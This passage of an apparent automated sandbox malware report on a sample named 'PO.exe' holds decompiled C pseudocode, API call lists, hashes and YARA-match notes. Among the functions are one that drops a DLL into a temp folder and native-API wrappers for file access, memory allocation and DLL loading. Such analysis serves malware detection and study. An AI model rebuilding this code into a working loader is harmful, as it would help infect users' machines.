				E004059E1(_t18, _t24, _t26, 0x4093f4,  *((intOrPtr*)(_t28 - 0x20)));
				_t14 = CreateFontIndirectA(0x4093d8);
				_push(_t14);
				_push(_t26);
				E0040591D();
				 *0x7a3008 =  *0x7a3008 +  *((intOrPtr*)(_t28 - 4));
				return 0;
			}











                                            0x00401d9c
                                            0x00401db5
                                            0x00401dbf
                                            0x00401dc4
                                            0x00401dcf
                                            0x00401dd6
                                            0x00401de8
                                            0x00401dee
                                            0x00401df3
                                            0x00401dfd
                                            0x00402536
                                            0x00401581
                                            0x004028d7
                                            0x00402932
                                            0x0040293e

                                            APIs
                                            • GetDC.USER32(?), ref: 00401D95
                                            • GetDeviceCaps.GDI32(00000000), ref: 00401D9C
                                            • MulDiv.KERNEL32(00000000,00000002,00000000), ref: 00401DAB
                                            • CreateFontIndirectA.GDI32(004093D8), ref: 00401DFD
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.239829820.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000000.00000002.239825580.0000000000400000.00000002.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.239837078.0000000000407000.00000002.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.239842903.0000000000409000.00000004.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.239870650.000000000077A000.00000004.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.239877497.0000000000784000.00000004.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.239882463.0000000000788000.00000004.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.239902318.0000000000795000.00000004.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.239912607.00000000007A1000.00000004.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.239917580.00000000007A9000.00000004.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.239922703.00000000007AC000.00000002.00020000.sdmp Download File
                                            Similarity
                                            • API ID: CapsCreateDeviceFontIndirect
                                            • String ID:
                                            • API String ID: 3272661963-0
                                            • Opcode ID: 512a0c0f17e64d15ab745448d4c3f8d5e5981439fe6f63d44a40da757e21bc15
                                            • Instruction ID: 1900d90730e4b23e0012eb78001e2751c68d3a10a93a8e7648ac2a5c53f67619
                                            • Opcode Fuzzy Hash: 512a0c0f17e64d15ab745448d4c3f8d5e5981439fe6f63d44a40da757e21bc15
                                            • Instruction Fuzzy Hash: 98F0C870948340EFEB009B70AEAEB9A3F649719301F144479FA41B61E3C6BC18008F3E
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Function 00404CA1, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 61windowCOMMON
                                            Download Yara Rule
                                            C-Code - Quality: 100%
                                            			E00404CA1(struct HWND__* _a4, int _a8, int _a12, long _a16) {
				int _t19;
				long _t23;

				if(_a8 != 0x102) {
					__eflags = _a8 - 2;
					if(_a8 == 2) {
						 *0x40929c =  *0x40929c | 0xffffffff;
						__eflags =  *0x40929c;
					}
					__eflags = _a8 - 0x200;
					if(_a8 != 0x200) {
						_t23 = _a16;
						goto L9;
					} else {
						_t19 = IsWindowVisible(_a4);
						__eflags = _t19;
						if(_t19 == 0) {
							L12:
							_t23 = _a16;
							L13:
							return CallWindowProcA( *0x79f574, _a4, _a8, _a12, _t23);
						}
						_t23 = E00404627(_a4, 1);
						_a8 = 0x419;
						L9:
						__eflags = _a8 - 0x419;
						if(_a8 == 0x419) {
							__eflags =  *0x40929c - _t23; // 0xffffffff
							if(__eflags != 0) {
								 *0x40929c = _t23;
								E004059BF(0x79f580, 0x7a4000);
								E0040591D(0x7a4000, _t23);
								E00401410(6);
								E004059BF(0x7a4000, 0x79f580);
							}
						}
						goto L13;
					}
				}
				if(_a12 == 0x20) {
					E00403DF3(0x413);
					return 0;
				}
				goto L12;
			}





                                            0x00404cad
                                            0x00404cca
                                            0x00404cce
                                            0x00404cd0
                                            0x00404cd0
                                            0x00404cd0
                                            0x00404cd7
                                            0x00404ce3
                                            0x00404d03
                                            0x00000000
                                            0x00404ce5
                                            0x00404ce8
                                            0x00404cee
                                            0x00404cf0
                                            0x00404d43
                                            0x00404d43
                                            0x00404d46
                                            0x00000000
                                            0x00404d56
                                            0x00404cfc
                                            0x00404cfe
                                            0x00404d06
                                            0x00404d06
                                            0x00404d09
                                            0x00404d0b
                                            0x00404d11
                                            0x00404d20
                                            0x00404d26
                                            0x00404d2d
                                            0x00404d34
                                            0x00404d3b
                                            0x00404d40
                                            0x00404d11
                                            0x00000000
                                            0x00404d09
                                            0x00404ce3
                                            0x00404cb3
                                            0x00404cbe
                                            0x00000000
                                            0x00404cc3
                                            0x00000000

                                            APIs
                                            • IsWindowVisible.USER32(?), ref: 00404CE8
                                            • CallWindowProcA.USER32 ref: 00404D56
                                              • Part of subcall function 00403DF3: SendMessageA.USER32(?,00000000,00000000,00000000), ref: 00403E05
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.239829820.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000000.00000002.239825580.0000000000400000.00000002.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.239837078.0000000000407000.00000002.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.239842903.0000000000409000.00000004.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.239870650.000000000077A000.00000004.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.239877497.0000000000784000.00000004.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.239882463.0000000000788000.00000004.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.239902318.0000000000795000.00000004.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.239912607.00000000007A1000.00000004.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.239917580.00000000007A9000.00000004.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.239922703.00000000007AC000.00000002.00020000.sdmp Download File
                                            Similarity
                                            • API ID: Window$CallMessageProcSendVisible
                                            • String ID:
                                            • API String ID: 3748168415-3916222277
                                            • Opcode ID: cefab2168f48871b8545a6b63d0f5fbb3bce144958928b992ab0555d20261f65
                                            • Instruction ID: cd4a28475afe767821094f105493c38d9b2306f15ef4c86c27c070550bfeb3f9
                                            • Opcode Fuzzy Hash: cefab2168f48871b8545a6b63d0f5fbb3bce144958928b992ab0555d20261f65
                                            • Instruction Fuzzy Hash: E111AF71500208FBDF219F11ED41A9B3725AF81365F00803AFA197A1E1C37D8E50CF59
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Function 0040253C, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 34filestringCOMMON
                                            Download Yara Rule
                                            C-Code - Quality: 100%
                                            			E0040253C(struct _OVERLAPPED* __ebx, intOrPtr* __esi) {
				int _t5;
				long _t7;
				struct _OVERLAPPED* _t11;
				intOrPtr* _t15;
				void* _t17;
				int _t21;

				_t15 = __esi;
				_t11 = __ebx;
				if( *((intOrPtr*)(_t17 - 0x1c)) == __ebx) {
					_t7 = lstrlenA(E00402A9A(0x11));
				} else {
					E00402A7D(1);
					 *0x40a018 = __al;
				}
				if( *_t15 == _t11) {
					L8:
					 *((intOrPtr*)(_t17 - 4)) = 1;
				} else {
					_t5 = WriteFile(E00405936(_t17 + 8, _t15), "C:\Users\alfons\AppData\Local\Temp\nsuA1D.tmp\gif000d.dll", _t7, _t17 + 8, _t11);
					_t21 = _t5;
					if(_t21 == 0) {
						goto L8;
					}
				}
				 *0x7a3008 =  *0x7a3008 +  *((intOrPtr*)(_t17 - 4));
				return 0;
			}









                                            0x0040253c
                                            0x0040253c
                                            0x0040253f
                                            0x0040255a
                                            0x00402541
                                            0x00402543
                                            0x00402548
                                            0x0040254f
                                            0x00402561
                                            0x004026da
                                            0x004026da
                                            0x00402567
                                            0x00402579
                                            0x004015c8
                                            0x004015ca
                                            0x00000000
                                            0x004015d0
                                            0x004015ca
                                            0x00402932
                                            0x0040293e

                                            APIs
                                            • lstrlenA.KERNEL32(00000000,00000011), ref: 0040255A
                                            • WriteFile.KERNEL32(00000000,?,C:\Users\user\AppData\Local\Temp\nsuA1D.tmp\gif000d.dll,00000000,?,?,00000000,00000011), ref: 00402579
                                            Strings
                                            • C:\Users\user\AppData\Local\Temp\nsuA1D.tmp\gif000d.dll, xrefs: 00402548, 0040256D
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.239829820.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000000.00000002.239825580.0000000000400000.00000002.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.239837078.0000000000407000.00000002.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.239842903.0000000000409000.00000004.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.239870650.000000000077A000.00000004.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.239877497.0000000000784000.00000004.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.239882463.0000000000788000.00000004.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.239902318.0000000000795000.00000004.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.239912607.00000000007A1000.00000004.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.239917580.00000000007A9000.00000004.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.239922703.00000000007AC000.00000002.00020000.sdmp Download File
                                            Similarity
                                            • API ID: FileWritelstrlen
                                            • String ID: C:\Users\user\AppData\Local\Temp\nsuA1D.tmp\gif000d.dll
                                            • API String ID: 427699356-4269949907
                                            • Opcode ID: 3d07f80d048e2c638fc755638a4a6850994cbad89dd1307057d881cba4918880
                                            • Instruction ID: abda26b523758e5a68d3ba22bbd8f990d4e7ca5ce812059aa2e21876e1d05e71
                                            • Opcode Fuzzy Hash: 3d07f80d048e2c638fc755638a4a6850994cbad89dd1307057d881cba4918880
                                            • Instruction Fuzzy Hash: EDF0E971A04244FED710EFA49D19AAF37649B11344F10443BB102F50C2D5BC4A455B6E
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Function 00405513, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 15stringCOMMON
                                            Download Yara Rule
                                            C-Code - Quality: 100%
                                            			E00405513(char* _a4) {
				char* _t3;
				char* _t4;

				_t4 = _a4;
				_t3 =  &(_t4[lstrlenA(_t4)]);
				while( *_t3 != 0x5c) {
					_t3 = CharPrevA(_t4, _t3);
					if(_t3 > _t4) {
						continue;
					}
					break;
				}
				 *_t3 =  *_t3 & 0x00000000;
				return _t3;
			}





                                            0x00405514
                                            0x0040551e
                                            0x00405520
                                            0x00405527
                                            0x0040552f
                                            0x00000000
                                            0x00000000
                                            0x00000000
                                            0x0040552f
                                            0x00405531
                                            0x00405535

                                            APIs
                                            • lstrlenA.KERNEL32(80000000,C:\Users\user\Desktop,00402C9D,C:\Users\user\Desktop,C:\Users\user\Desktop,80000000,00000003,?,?,Error writing temporary file. Make sure your temp folder is valid.,004032AF,00000000,00000000,00000020), ref: 00405519
                                            • CharPrevA.USER32(80000000,00000000,80000000,C:\Users\user\Desktop,00402C9D,C:\Users\user\Desktop,C:\Users\user\Desktop,80000000,00000003,?,?,Error writing temporary file. Make sure your temp folder is valid.,004032AF,00000000,00000000,00000020), ref: 00405527
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.239829820.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000000.00000002.239825580.0000000000400000.00000002.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.239837078.0000000000407000.00000002.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.239842903.0000000000409000.00000004.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.239870650.000000000077A000.00000004.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.239877497.0000000000784000.00000004.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.239882463.0000000000788000.00000004.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.239902318.0000000000795000.00000004.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.239912607.00000000007A1000.00000004.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.239917580.00000000007A9000.00000004.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.239922703.00000000007AC000.00000002.00020000.sdmp Download File
                                            Similarity
                                            • API ID: CharPrevlstrlen
                                            • String ID: C:\Users\user\Desktop
                                            • API String ID: 2709904686-1246513382
                                            • Opcode ID: 680019072755fb7b9246c28769c8d796fd5c75f8e8191a3aa30db9a90a6369eb
                                            • Instruction ID: 9a19af462094a1157adf0a1695e347c504c30875ce7c89a43b2e01bcf73e6b15
                                            • Opcode Fuzzy Hash: 680019072755fb7b9246c28769c8d796fd5c75f8e8191a3aa30db9a90a6369eb
                                            • Instruction Fuzzy Hash: 41D0A7B2409D706EE3031214DC04B8F7A488F17320F0904A2F040A61E5C2780C418BBD
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Function 00405624, Relevance: 5.0, APIs: 4, Instructions: 30stringCOMMON
                                            Download Yara Rule
                                            C-Code - Quality: 100%
                                            			E00405624(CHAR* _a4, CHAR* _a8) {
				int _t10;
				int _t15;
				CHAR* _t16;

				_t15 = lstrlenA(_a8);
				_t16 = _a4;
				while(lstrlenA(_t16) >= _t15) {
					 *(_t15 + _t16) =  *(_t15 + _t16) & 0x00000000;
					_t10 = lstrcmpiA(_t16, _a8);
					if(_t10 == 0) {
						return _t16;
					}
					_t16 = CharNextA(_t16);
				}
				return 0;
			}






                                            0x00405630
                                            0x00405632
                                            0x0040565a
                                            0x0040563f
                                            0x00405644
                                            0x0040564f
                                            0x00000000
                                            0x0040566c
                                            0x00405658
                                            0x00405658
                                            0x00000000

                                            APIs
                                            • lstrlenA.KERNEL32(00000000,?,00000000,00000000,00405828,00000000,[Rename],?,?,00000000,000000F1,?), ref: 0040562B
                                            • lstrcmpiA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,00000000,00405828,00000000,[Rename],?,?,00000000,000000F1,?), ref: 00405644
                                            • CharNextA.USER32(00000000,?,?,00000000,000000F1,?), ref: 00405652
                                            • lstrlenA.KERNEL32(00000000,00000000,?,00000000,00000000,00405828,00000000,[Rename],?,?,00000000,000000F1,?), ref: 0040565B
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.239829820.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000000.00000002.239825580.0000000000400000.00000002.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.239837078.0000000000407000.00000002.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.239842903.0000000000409000.00000004.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.239870650.000000000077A000.00000004.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.239877497.0000000000784000.00000004.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.239882463.0000000000788000.00000004.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.239902318.0000000000795000.00000004.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.239912607.00000000007A1000.00000004.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.239917580.00000000007A9000.00000004.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.239922703.00000000007AC000.00000002.00020000.sdmp Download File
                                            Similarity
                                            • API ID: lstrlen$CharNextlstrcmpi
                                            • String ID:
                                            • API String ID: 190613189-0
                                            • Opcode ID: f6e5a91ec7db47e15e60a1c150abbc6d75b5c44b2e203e3a2d493a33770f074b
                                            • Instruction ID: 467c7d4f976b1c4b769b407f61edba7cefb266b08e25db718ea0bc1606fb1982
                                            • Opcode Fuzzy Hash: f6e5a91ec7db47e15e60a1c150abbc6d75b5c44b2e203e3a2d493a33770f074b
                                            • Instruction Fuzzy Hash: 3DF0A736249D91AAC2126B359C04E6F7F94EF92325B68097AF444F2140D73A9C119BBB
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Analysis Process: PO.exe PID: 2904 Parent PID: 5720 PO.exeCOMMON

                                            Executed Functions

                                            Function 00419DB3, Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 82filenativeCOMMON
                                            Download Yara Rule
                                            APIs
                                            • NtReadFile.NTDLL(BMA,5EB6522D,FFFFFFFF,00414A01,?,?,BMA,?,00414A01,FFFFFFFF,5EB6522D,00414D42,?,00000000), ref: 00419E55
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000001.00000002.281309352.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                            Yara matches
                                            Similarity
                                            • API ID: FileRead
                                            • String ID: BMA$BMA$HA
                                            • API String ID: 2738559852-181183267
                                            • Opcode ID: 626ca87b58b969c046a3a753cb38a2af31e37882697376742a298c054dc01132
                                            • Instruction ID: 78f4a1ae6b5b580f3ecfaec55e7fbe2e14e3257eeb8910dc7bc4c3a3c9dcf8a8
                                            • Opcode Fuzzy Hash: 626ca87b58b969c046a3a753cb38a2af31e37882697376742a298c054dc01132
                                            • Instruction Fuzzy Hash: B321F8B5200108AFCB18CF99DC85EEB77A9EF8C354F158649FA4DA7241C634E851CBA4
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Function 00419E10, Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 36filenativeCOMMON
                                            Download Yara Rule
                                            C-Code - Quality: 37%
                                            			E00419E10(intOrPtr _a4, char _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20, intOrPtr _a24, intOrPtr _a28, char _a32, intOrPtr _a36, intOrPtr _a40) {
				void* _t18;
				void* _t27;
				intOrPtr* _t28;

				_t13 = _a4;
				_t28 = _a4 + 0xc48;
				E0041A960(_t27, _t13, _t28,  *((intOrPtr*)(_t13 + 0x10)), 0, 0x2a);
				_t6 =  &_a32; // 0x414d42
				_t12 =  &_a8; // 0x414d42
				_t18 =  *((intOrPtr*)( *_t28))( *_t12, _a12, _a16, _a20, _a24, _a28,  *_t6, _a36, _a40); // executed
				return _t18;
			}






                                            0x00419e13
                                            0x00419e1f
                                            0x00419e27
                                            0x00419e32
                                            0x00419e4d
                                            0x00419e55
                                            0x00419e59

                                            APIs
                                            • NtReadFile.NTDLL(BMA,5EB6522D,FFFFFFFF,00414A01,?,?,BMA,?,00414A01,FFFFFFFF,5EB6522D,00414D42,?,00000000), ref: 00419E55
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000001.00000002.281309352.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                            Yara matches
                                            Similarity
                                            • API ID: FileRead
                                            • String ID: BMA$BMA
                                            • API String ID: 2738559852-2163208940
                                            • Opcode ID: d4a5a74702051ab3f1355cb9c04464ae45872bc81882c1ce62b08827cfd1deed
                                            • Instruction ID: bd248b349f18b2ced93d1e709abaf342431bbeaaaaa26160fd0c904447d41470
                                            • Opcode Fuzzy Hash: d4a5a74702051ab3f1355cb9c04464ae45872bc81882c1ce62b08827cfd1deed
                                            • Instruction Fuzzy Hash: 45F0B7B2210208AFCB14DF89DC81EEB77ADEF8C754F158649BE1DA7241D630E851CBA4
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Function 0040ACD0, Relevance: 1.5, APIs: 1, Instructions: 48libraryloaderCOMMON
                                            Download Yara Rule
                                            C-Code - Quality: 50%
                                            			E0040ACD0(void* __eflags, void* _a4, intOrPtr _a8) {
				char* _v8;
				struct _EXCEPTION_RECORD _v12;
				struct _OBJDIR_INFORMATION _v16;
				char _v536;
				void* _t15;
				struct _OBJDIR_INFORMATION _t17;
				struct _OBJDIR_INFORMATION _t18;
				void* _t30;
				void* _t31;
				void* _t32;

				_push(_a8);
				_push(0x104);
				_push( &_v12);
				_v8 =  &_v536;
				_t15 = E0041C650();
				_t31 = _t30 + 0xc;
				if(_t15 != 0) {
					_t17 = E0041CA70(__eflags, _v8);
					_t32 = _t31 + 4;
					__eflags = _t17;
					if(_t17 != 0) {
						E0041CCF0( &_v12, 0);
						_t32 = _t32 + 8;
					}
					_t18 = E0041AEA0(_v8);
					_v16 = _t18;
					__eflags = _t18;
					if(_t18 == 0) {
						LdrLoadDll(0, 0,  &_v12,  &_v16); // executed
						return _v16;
					}
					return _t18;
				} else {
					return _t15;
				}
			}













                                            0x0040acdc
                                            0x0040ace6
                                            0x0040aceb
                                            0x0040acec
                                            0x0040acef
                                            0x0040acf4
                                            0x0040acf9
                                            0x0040ad03
                                            0x0040ad08
                                            0x0040ad0b
                                            0x0040ad0d
                                            0x0040ad15
                                            0x0040ad1a
                                            0x0040ad1a
                                            0x0040ad21
                                            0x0040ad29
                                            0x0040ad2c
                                            0x0040ad2e
                                            0x0040ad42
                                            0x00000000
                                            0x0040ad44
                                            0x0040ad4a
                                            0x0040acfe
                                            0x0040acfe
                                            0x0040acfe

                                            APIs
                                            • LdrLoadDll.NTDLL(00000000,00000000,00000003,?), ref: 0040AD42
                                            Memory Dump Source
                                            • Source File: 00000001.00000002.281309352.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                            Yara matches
                                            Similarity
                                            • API ID: Load
                                            • String ID:
                                            • API String ID: 2234796835-0
                                            • Opcode ID: 8dd989eea79af60a2177110ff857ca10202f9c8b5bfc158903865a0a4b584fe4
                                            • Instruction ID: b21dceb9c17b581325113e7f9749888d8b8163c3e846858d6705abbd9991eecb
                                            • Opcode Fuzzy Hash: 8dd989eea79af60a2177110ff857ca10202f9c8b5bfc158903865a0a4b584fe4
                                            • Instruction Fuzzy Hash: A8015EB5D4020DBBDF10DBA5DC82FDEB3789F54308F0041AAE909A7281F635EB548B96
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Function 00419D60, Relevance: 1.5, APIs: 1, Instructions: 40filenativeCOMMON
                                            Download Yara Rule
                                            C-Code - Quality: 100%
                                            			E00419D60(intOrPtr _a4, HANDLE* _a8, long _a12, struct _EXCEPTION_RECORD _a16, struct _ERESOURCE_LITE _a20, struct _GUID _a24, long _a28, long _a32, long _a36, long _a40, void* _a44, long _a48) {
				long _t21;
				void* _t31;

				_t3 = _a4 + 0xc40; // 0xc40
				E0041A960(_t31, _a4, _t3,  *((intOrPtr*)(_a4 + 0x10)), 0, 0x28);
				_t21 = NtCreateFile(_a8, _a12, _a16, _a20, _a24, _a28, _a32, _a36, _a40, _a44, _a48); // executed
				return _t21;
			}





                                            0x00419d6f
                                            0x00419d77
                                            0x00419dad
                                            0x00419db1

                                            APIs
                                            • NtCreateFile.NTDLL(00000060,00409CD3,?,00414B87,00409CD3,FFFFFFFF,?,?,FFFFFFFF,00409CD3,00414B87,?,00409CD3,00000060,00000000,00000000), ref: 00419DAD
                                            Memory Dump Source
                                            • Source File: 00000001.00000002.281309352.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                            Yara matches
                                            Similarity
                                            • API ID: CreateFile
                                            • String ID:
                                            • API String ID: 823142352-0
                                            • Opcode ID: 255eac8f353b7b8934ff6a71ff904c2473dc3201d920852afcf054611f931be4
                                            • Instruction ID: 5d405ca8330a7760d33d8cb8f94c0e61ce0ec213ce21d6c827413d184fac496c
                                            • Opcode Fuzzy Hash: 255eac8f353b7b8934ff6a71ff904c2473dc3201d920852afcf054611f931be4
                                            • Instruction Fuzzy Hash: F1F0B2B2211208ABCB08CF89DC85EEB77ADAF8C754F158248BA0D97241C630E8518BA4
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Function 00419F3B, Relevance: 1.5, APIs: 1, Instructions: 31memorynativeCOMMON
                                            Download Yara Rule
                                            C-Code - Quality: 79%
                                            			E00419F3B(intOrPtr _a4, void* _a8, PVOID* _a12, long _a16, long* _a20, long _a24, long _a28) {
				long _t15;
				void* _t22;

				asm("sbb [edx+edi*2+0x55], bl");
				_t11 = _a4;
				_t3 = _t11 + 0xc60; // 0xca0
				E0041A960(_t22, _a4, _t3,  *((intOrPtr*)(_a4 + 0x10)), 0, 0x30);
				_t15 = NtAllocateVirtualMemory(_a8, _a12, _a16, _a20, _a24, _a28); // executed
				return _t15;
			}





                                            0x00419f3d
                                            0x00419f43
                                            0x00419f4f
                                            0x00419f57
                                            0x00419f79
                                            0x00419f7d

                                            APIs
                                            • NtAllocateVirtualMemory.NTDLL(00003000,?,00000000,?,0041AB34,?,00000000,?,00003000,00000040,00000000,00000000,00409CD3), ref: 00419F79
                                            Memory Dump Source
                                            • Source File: 00000001.00000002.281309352.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                            Yara matches
                                            Similarity
                                            • API ID: AllocateMemoryVirtual
                                            • String ID:
                                            • API String ID: 2167126740-0
                                            • Opcode ID: fe6b8a907076808e944212e22f765545b0788f538b6f03c9a2ed4e1ee3026a47
                                            • Instruction ID: 4ffe603f4016fbc21ed17f300f95f4eb974d244daf2ee2f018f5a58db0dd8ed6
                                            • Opcode Fuzzy Hash: fe6b8a907076808e944212e22f765545b0788f538b6f03c9a2ed4e1ee3026a47
                                            • Instruction Fuzzy Hash: 05F058B6200208ABCB14DF89CC81EE777A8AF8C614F158189FA08A7241C230E811CBE0
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Function 00419F40, Relevance: 1.5, APIs: 1, Instructions: 30memorynativeCOMMON
                                            Download Yara Rule
                                            C-Code - Quality: 100%
                                            			E00419F40(intOrPtr _a4, void* _a8, PVOID* _a12, long _a16, long* _a20, long _a24, long _a28) {
				long _t14;
				void* _t21;

				_t3 = _a4 + 0xc60; // 0xca0
				E0041A960(_t21, _a4, _t3,  *((intOrPtr*)(_a4 + 0x10)), 0, 0x30);
				_t14 = NtAllocateVirtualMemory(_a8, _a12, _a16, _a20, _a24, _a28); // executed
				return _t14;
			}





                                            0x00419f4f
                                            0x00419f57
                                            0x00419f79
                                            0x00419f7d

                                            APIs
                                            • NtAllocateVirtualMemory.NTDLL(00003000,?,00000000,?,0041AB34,?,00000000,?,00003000,00000040,00000000,00000000,00409CD3), ref: 00419F79
                                            Memory Dump Source
                                            • Source File: 00000001.00000002.281309352.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                            Yara matches
                                            Similarity
                                            • API ID: AllocateMemoryVirtual
                                            • String ID:
                                            • API String ID: 2167126740-0
                                            • Opcode ID: b2c7a9f16f7248b886659db27fd6bc2ac43cd74a54ece53f3674161978f52f4b
                                            • Instruction ID: 9c08e1581e5817f7e91e4b21b7a397560e598f802d56d9274a49c90b7c070efe
                                            • Opcode Fuzzy Hash: b2c7a9f16f7248b886659db27fd6bc2ac43cd74a54ece53f3674161978f52f4b
                                            • Instruction Fuzzy Hash: 1EF015B2210208ABCB14DF89CC81EEB77ADEF88754F158549BE08A7241C630F810CBA4
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Function 00419E8A, Relevance: 1.5, APIs: 1, Instructions: 21nativeCOMMON
                                            Download Yara Rule
                                            C-Code - Quality: 100%
                                            			E00419E8A(void* __eax, intOrPtr _a4, void* _a8) {
				long _t11;
				void* _t15;

				_t8 = _a4;
				_t2 = _t8 + 0x10; // 0x300
				_t3 = _t8 + 0xc50; // 0x40a923
				E0041A960(_t15, _a4, _t3,  *_t2, 0, 0x2c);
				_t11 = NtClose(_a8); // executed
				return _t11;
			}





                                            0x00419e93
                                            0x00419e96
                                            0x00419e9f
                                            0x00419ea7
                                            0x00419eb5
                                            0x00419eb9

                                            APIs
                                            • NtClose.NTDLL(00414D20,?,?,00414D20,00409CD3,FFFFFFFF), ref: 00419EB5
                                            Memory Dump Source
                                            • Source File: 00000001.00000002.281309352.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                            Yara matches
                                            Similarity
                                            • API ID: Close
                                            • String ID:
                                            • API String ID: 3535843008-0
                                            • Opcode ID: 1cf223d24ec8c2d59c3dc4b95d171e0186d941f099c4c533676dc744f878c66a
                                            • Instruction ID: 9ba7465aaca89f8ee684024cdd552b888b860dceca0564a18d6204a4d5c4d2a0
                                            • Opcode Fuzzy Hash: 1cf223d24ec8c2d59c3dc4b95d171e0186d941f099c4c533676dc744f878c66a
                                            • Instruction Fuzzy Hash: 4AE08C79200200AFD710DB94CC86EEB3B28EF44760F19449AFA685B242C130A5008BA0
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Function 00419E90, Relevance: 1.5, APIs: 1, Instructions: 20nativeCOMMON
                                            Download Yara Rule
                                            C-Code - Quality: 100%
                                            			E00419E90(intOrPtr _a4, void* _a8) {
				long _t8;
				void* _t11;

				_t5 = _a4;
				_t2 = _t5 + 0x10; // 0x300
				_t3 = _t5 + 0xc50; // 0x40a923
				E0041A960(_t11, _a4, _t3,  *_t2, 0, 0x2c);
				_t8 = NtClose(_a8); // executed
				return _t8;
			}





                                            0x00419e93
                                            0x00419e96
                                            0x00419e9f
                                            0x00419ea7
                                            0x00419eb5
                                            0x00419eb9

                                            APIs
                                            • NtClose.NTDLL(00414D20,?,?,00414D20,00409CD3,FFFFFFFF), ref: 00419EB5
                                            Memory Dump Source
                                            • Source File: 00000001.00000002.281309352.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                            Yara matches
                                            Similarity
                                            • API ID: Close
                                            • String ID:
                                            • API String ID: 3535843008-0
                                            • Opcode ID: 462dc2fd90f57a4a7913ee6487bbcc8fe2490777b3746e68c632e34f0b64e1a4
                                            • Instruction ID: e68336ecf97fcbff1cce52d5eab911d0c0d253976a6ab71543f56f2ca0e2158f
                                            • Opcode Fuzzy Hash: 462dc2fd90f57a4a7913ee6487bbcc8fe2490777b3746e68c632e34f0b64e1a4
                                            • Instruction Fuzzy Hash: 6CD012752002146BD710EB99CC85ED7776CEF44760F154459BA5C5B242C530F55086E0
                                            Uniqueness

                                            Uniqueness Score: -1.00%

